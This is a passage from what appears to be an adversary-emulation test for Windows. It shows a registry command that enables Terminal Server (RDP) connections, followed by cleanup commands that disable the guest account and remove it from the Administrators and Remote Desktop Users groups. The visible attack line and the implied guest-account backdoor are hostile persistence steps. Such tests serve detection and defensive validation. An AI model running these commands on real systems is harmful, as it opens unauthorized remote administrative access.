reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
```
#### Cleanup Commands:
```cmd
net user guest /active:no
net localgroup administrators guest /delete
net localgroup "Remote Desktop Users" guest /delete
reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f
reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f
```